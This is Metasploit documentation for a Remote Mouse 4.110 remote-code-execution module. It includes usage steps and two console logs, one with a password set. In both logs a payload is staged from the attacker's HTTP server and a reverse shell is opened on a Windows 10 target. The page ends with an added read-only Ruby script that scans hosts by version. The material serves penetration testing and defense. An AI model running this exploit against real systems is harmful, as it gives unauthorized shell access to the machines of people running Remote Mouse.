## Vulnerable Application

This module uses the Remote Mouse Server protocol (Emote Interactive) to deploy a payload and run it from the server, on versions < 4.200 (500 server response). The payload is deployed regardless of whether server authentication is required: the keystroke and mouse commands the module relies on are accepted even when the server is configured with a password (see the second scenario below).

Tested against 4.110, current at the time of module writing. Version 4.110 can be downloaded from an [unofficial site](https://remote-mouse.en.uptodown.com/windows/download/4546712).

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/windows/misc/remote_mouse_rce`
4. Set `rhost` and `lhost` as required.
5. Do: `run`
6. You should get a shell as the user who is running Remote Mouse.

## Options

### SLEEP

The length of time, in seconds, to sleep between each command. This gives the remote program time to process the command on screen. Defaults to `1`.

### PATH

The path where the payload should be downloaded/staged to. Defaults to `c:\\Windows\\Temp\\`.

## Scenarios

### Remote Mouse 4.110 on Windows 10

```
resource (remote_mouse.rb)> use exploits/windows/misc/remote_mouse_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (remote_mouse.rb)> set rhosts 192.168.2.95
rhosts => 192.168.2.95
resource (remote_mouse.rb)> set lhost 192.168.2.199
lhost => 192.168.2.199
resource (remote_mouse.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/remote_mouse_rce) > run

[*] Started reverse TCP handler on 192.168.2.199:4444 
[*] 192.168.2.95:1978 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.2.95:1978 - The target appears to be vulnerable. Received handshake with version: 411
[*] 192.168.2.95:1978 - Connecting
[*] 192.168.2.95:1978 - Sending Windows key
[*] 192.168.2.95:1978 - Opening command prompt
[*] 192.168.2.95:1978 - Sending stager
[*] 192.168.2.95:1978 - Using URL: http://192.168.2.199:8080/
[+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging
[+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging
[*] 192.168.2.95:1978 - Executing payload
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.2.95
[*] Command shell session 1 opened (192.168.2.199:4444 -> 192.168.2.95:49962) at 2022-09-27 16:33:02 -0400
[*] 192.168.2.95:1978 - Server stopped.
[!] 192.168.2.95:1978 - This exploit may require manual cleanup of 'c:\Windows\Temp\NADYvmtxr.exe' on the target

Shell Banner:
Microsoft Windows [Version 10.0.16299.125]
-----

C:\Users\windows>whoami
whoami
win10prolicense\windows

C:\Users\windows>systeminfo
systeminfo

Host Name:                 WIN10PROLICENSE
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.16299 N/A Build 16299
```

### Remote Mouse 4.110 on Windows 10, with a password

```
resource (remote_mouse.rb)> use exploits/windows/misc/remote_mouse_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (remote_mouse.rb)> set rhosts 192.168.2.95
rhosts => 192.168.2.95
resource (remote_mouse.rb)> set lhost 192.168.2.199
lhost => 192.168.2.199
resource (remote_mouse.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/remote_mouse_rce) > exploit

[*] Started reverse TCP handler on 192.168.2.199:4444 
[*] 192.168.2.95:1978 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.2.95:1978 - The target appears to be vulnerable. Received handshake with version: 411
[*] 192.168.2.95:1978 - Connecting
[*] 192.168.2.95:1978 - Sending Windows key
[*] 192.168.2.95:1978 - Opening command prompt
[*] 192.168.2.95:1978 - Sending stager
[*] 192.168.2.95:1978 - Using URL: http://192.168.2.199:8080/
[+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging
[+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging
[*] 192.168.2.95:1978 - Executing payload
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.2.95
[*] Command shell session 1 opened (192.168.2.199:4444 -> 192.168.2.95:49975) at 2022-09-27 16:36:09 -0400
[*] 192.168.2.95:1978 - Server stopped.
[!] 192.168.2.95:1978 - This exploit may require manual cleanup of 'c:\Windows\Temp\86a4GsbpomvEgUS.exe' on the target

Shell Banner:
Microsoft Windows [Version 10.0.16299.125]
-----

C:\Users\windows>
```
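The module's automatic check decides on the version announced in the server handshake (`Received handshake with version: 411` above, against the `< 4.200 (500 server response)` boundary given under Vulnerable Application). The following Ruby script is an added example, not code from the Metasploit module or from Emote Interactive, for the defender-side version of that check: an inventory scan that connects to the Remote Mouse port (1978, as in the scenario output), reads the handshake, and classifies each host without sending any keystrokes or deploying anything. It assumes that the version appears in the handshake as a bare three-digit token such as `411`, that a version below `500` means the host is affected, and that the server may need the client to speak first (the optional `probe:` argument is there for that; the example does not know the real opener). Host addresses and banners in the self-test are constructed.

```ruby
# Added example: read-only inventory check for Remote Mouse servers.
# Not part of the Metasploit module; the handshake format and the
# "below 500 = affected" rule are assumptions taken from the module's
# verbose output and documentation, not from the vendor protocol spec.
require 'socket'
require 'io/wait'

module RemoteMouseInventory
  DEFAULT_PORT  = 1978  # port seen in the module's scenario output
  VERSION_FIXED = 500   # assumption: the "500 server response" of 4.200 and later

  # Extract the version the server announces. Assumption: it appears as a
  # bare three-digit token (e.g. "411" for 4.110, as the module prints).
  def self.parse_version(banner)
    return nil unless banner.is_a?(String)
    m = banner.match(/\b(\d{3})\b/)
    m && m[1].to_i
  end

  # :affected below the fixed threshold, :unknown when nothing parsed.
  def self.classify(version)
    return :unknown if version.nil?
    version < VERSION_FIXED ? :affected : :not_affected
  end

  # Connect, optionally send a probe (if the real server needs the client to
  # speak first), and read whatever the server answers within the timeout.
  # Returns the raw banner, or nil if the port is closed, filtered or silent.
  def self.grab_banner(host, port: DEFAULT_PORT, timeout: 3, probe: nil)
    sock = Socket.tcp(host, port, connect_timeout: timeout)
    sock.write(probe) if probe
    return nil unless sock.wait_readable(timeout)
    data = sock.read_nonblock(1024, exception: false)
    data.is_a?(String) ? data : nil
  rescue SystemCallError, IOError
    nil
  ensure
    sock&.close
  end

  # Turn one raw banner into the record the report uses.
  def self.assess(host, banner)
    version = parse_version(banner)
    { host: host, banner: banner, version: version, status: classify(version) }
  end

  # Scan hosts concurrently with a small worker pool; one record per host.
  def self.scan(hosts, port: DEFAULT_PORT, timeout: 3, probe: nil, workers: 16)
    queue = Queue.new
    hosts.each { |h| queue << h }
    results = Queue.new
    threads = Array.new([workers, hosts.size].min) do
      Thread.new do
        while (host = queue.pop(true) rescue nil)
          results << assess(host, grab_banner(host, port: port, timeout: timeout, probe: probe))
        end
      end
    end
    threads.each(&:join)
    Array.new(results.size) { results.pop }.sort_by { |r| r[:host] }
  end

  # One line per host, affected hosts first so they stand out in a report.
  def self.report(records)
    order = { affected: 0, unknown: 1, not_affected: 2 }
    records.sort_by { |r| [order[r[:status]], r[:host]] }.map do |r|
      ver = r[:version] ? r[:version].to_s : (r[:banner] ? 'unparsed' : 'no service')
      format('%-16s %-13s version=%s', r[:host], r[:status], ver)
    end
  end
end

if $PROGRAM_NAME == __FILE__
  # Constructed banners standing in for live hosts, so the report logic can be
  # exercised offline; replace with RemoteMouseInventory.scan(ARGV) on a real network.
  sample = {
    '192.168.2.95' => 'Remote Mouse 411',  # constructed, mirrors the 4.110 scenario
    '192.168.2.96' => 'Remote Mouse 500',  # constructed, the "500 server response"
    '192.168.2.97' => nil                  # constructed: nothing listening on 1978
  }
  records = sample.map { |host, banner| RemoteMouseInventory.assess(host, banner) }
  puts RemoteMouseInventory.report(records)
end
```

Run it against a host list (`ruby remote_mouse_inventory.rb` with `scan(ARGV)` swapped in for the constructed sample) and verify the regex against one known 4.110 server first: if the real handshake carries other three-digit fields, tighten the pattern before trusting the `not_affected` column.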